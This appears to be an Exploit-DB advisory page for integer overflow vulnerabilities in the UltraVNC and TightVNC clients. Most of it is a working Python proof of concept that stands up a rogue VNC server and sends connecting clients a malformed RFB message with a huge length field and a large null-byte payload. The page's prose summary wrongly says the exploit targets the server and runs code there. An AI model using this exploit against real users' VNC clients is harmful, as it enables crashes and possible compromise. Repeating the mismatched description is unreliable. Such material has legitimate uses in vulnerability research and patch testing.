Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC)

vendor:

UltraVNC and TightVNC

by:

Andres Lopez Luksenberg

7.5

CVSS

HIGH

Integer Overflow

190

CWE

Product Name: UltraVNC and TightVNC

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC)

This exploit is a proof of concept for multiple integer overflow vulnerabilities in UltraVNC and TightVNC. The exploit sends a malicious RFB protocol message to the server, which causes an integer overflow and a buffer overflow. This can be used to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of UltraVNC and TightVNC.

Source

Exploit-DB raw data:

#!/usr/bin/env python
# POC: Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC), BID 33568
#Author: Andres Lopez Luksenberg <polakocai@gmail.com> (Visit: http://208.66.16.113/~andres/)
#
import socket

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)

while True:
		print "Author: Andres Lopez Luksenberg <polakocai@gmail.com> (Visit: http://208.66.16.113/~andres/)"

		clientsocket, clientaddres = serversocket.accept()
		
		data = 'RFB 003.003\n'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		print data_cli

		data = '\x00'
		clientsocket.sendall(data)

		data = '\x00\x00\x00\x75'
		clientsocket.sendall(data)
		data = '\x00' * int(0xffffff)

		clientsocket.sendall(data)

clientsocket.close()
serversocket.close()

# milw0rm.com [2009-02-04]